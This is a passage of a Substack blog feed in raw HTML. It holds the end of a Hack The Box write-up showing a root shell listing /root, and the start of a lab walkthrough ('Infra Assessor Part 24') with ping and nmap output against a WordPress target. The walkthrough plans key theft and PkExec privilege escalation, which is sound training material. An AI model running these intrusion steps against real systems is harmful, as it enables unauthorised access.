data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:328,&quot;width&quot;:1313,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:168921,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5dff89b8-7bd0-4b76-991e-41f5dae375b6_1910x874.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tUsc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 424w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 848w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 1272w, https://substackcdn.com/image/fetch/$s_!tUsc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53d5c4e0-4f51-45ff-afbf-a76824a22443_1313x328.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><pre><code>root@conversor:/tmp# whoami
root
root@conversor:/tmp# cd /root
root@conversor:~# ls
root.txt  scripts
root@conversor:~# cd scripts
root@conversor:~/scripts# ls
clean_sudo.sh  clean_web.py  sudoers
root@conversor:~/scripts# cd ..
root@conversor:~# ls -al
total 44
drwx------  6 root root 4096 Oct 26 02:09 .
drwxr-xr-x 19 root root 4096 Oct 21 05:45 ..
lrwxrwxrwx  1 root root    9 Oct 21 05:45 .bash_history -&gt; /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwxr-xr-x  2 root root 4096 Aug 15 05:06 .cache
drwxr-xr-x  3 root root 4096 Sep 23 14:00 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
lrwxrwxrwx  1 root root    9 Aug 15 04:40 .python_history -&gt; /dev/null
-rw-r-----  1 root root   33 Oct 26 02:09 root.txt
drwxr-xr-x  2 root root 4096 Oct 16 10:25 scripts
-rw-r--r--  1 root root   66 Jul 31 05:36 .selected_editor
lrwxrwxrwx  1 root root    9 Jul 31 22:04 .sqlite_history -&gt; /dev/null
drwx------  2 root root 4096 Aug 15 05:06 .ssh
-rw-r--r--  1 root root  165 Oct 21 05:45 .wget-hsts
root@conversor:~# cd .ssh
root@conversor:~/.ssh# ls
root@conversor:~/.ssh# </code></pre><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!We3H!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!We3H!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 424w, https://substackcdn.com/image/fetch/$s_!We3H!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 848w, https://substackcdn.com/image/fetch/$s_!We3H!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 1272w, https://substackcdn.com/image/fetch/$s_!We3H!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!We3H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png" width="792" height="447" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:447,&quot;width&quot;:792,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:179272,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/177145128?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!We3H!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 424w, https://substackcdn.com/image/fetch/$s_!We3H!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 848w, https://substackcdn.com/image/fetch/$s_!We3H!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 1272w, https://substackcdn.com/image/fetch/$s_!We3H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd9e3dbd1-4c89-488a-a5bb-45b29a3d0097_792x447.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><em><a href="https://labs.hackthebox.com/achievement/machine/1929663/787">labs.hackthebox.com/achievement/machine/1929663/787</a></em></p></li></ul><p>Absolute banger!</p><p>Until next time and Happy Hacking, together we make the Internet more bleeding!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Infra Assessor from WebApp to Local Machine: Part 24]]></title><description><![CDATA[Start by WordPress, discover an Id_RSA key in a hidden directory belongs to Local User named "OSCP" for initial access. PrivEsc to root via discover a vulnerable PkExec on an Ubuntu System.]]></description><link>https://byt3n33dl3.substack.com/p/infra-assessor-from-webapp-to-local-9a1</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/infra-assessor-from-webapp-to-local-9a1</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Wed, 04 Mar 2026 07:26:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Z7F3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z7F3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 424w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 848w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1272w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png" width="725" height="499.44444444444446" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:403,&quot;width&quot;:585,&quot;resizeWidth&quot;:725,&quot;bytes&quot;:82862,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:&quot;&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/186053649?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!Z7F3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 424w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 848w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1272w, https://substackcdn.com/image/fetch/$s_!Z7F3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc9d9cdc0-0667-4b17-91df-e4c98b18b603_585x403.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Offensive Security</h2><p>On this another internal Pentesting practices, all we got is an IP Address:</p><pre><code><code>192.168.179.89</code></code></pre><p>Start with:</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;c020d9e7-ee2b-411e-af73-3df5072ee627&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 192.168.179.89
PING 192.168.179.89 (192.168.179.89) 56(84) bytes of data.
64 bytes from 192.168.179.89: icmp_seq=1 ttl=61 time=20.5 ms
64 bytes from 192.168.179.89: icmp_seq=2 ttl=61 time=21.0 ms

--- 192.168.179.89 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 20.478/20.763/21.049/0.285 ms</code></pre></div><p>Continue with NMAP Scanning</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 192.168.179.89 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 192.168.179.89
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p22,80,33060 -sC -sV 192.168.179.89 -oA nmap/nmapscan-ports
Starting Nmap 7.95 ( https://nmap.org ) at
Nmap scan report for 192.168.179.89
Host is up (0.026s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
|   256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_  256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret.txt
|_http-generator: WordPress 5.4.2
|_http-title: OSCP Voucher &amp;#8211; Just another WordPress site
33060/tcp open  mysqlx  MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>Okay, we can see it&#8217;s a WordPress based Web service.</p><ol start="2"><li><p><em>HTTP Web Enumeration</em></p></li></ol><p>This is the interface:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RM-0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RM-0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RM-0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:143612,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RM-0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!RM-0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbcf8e23-4c23-4542-8a3a-940df2e565ae_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Realize this is WordPress and so much interaction, I decide to just scroll lil bit then continue with Ferox-buster:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!U2MX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!U2MX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!U2MX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png" width="1456" height="715" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:715,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:115076,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189852119?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!U2MX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 424w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 848w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 1272w, https://substackcdn.com/image/fetch/$s_!U2MX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccbab61e-19b5-4d13-9b0a-c9a73f1c28f7_1699x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Ferox:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" 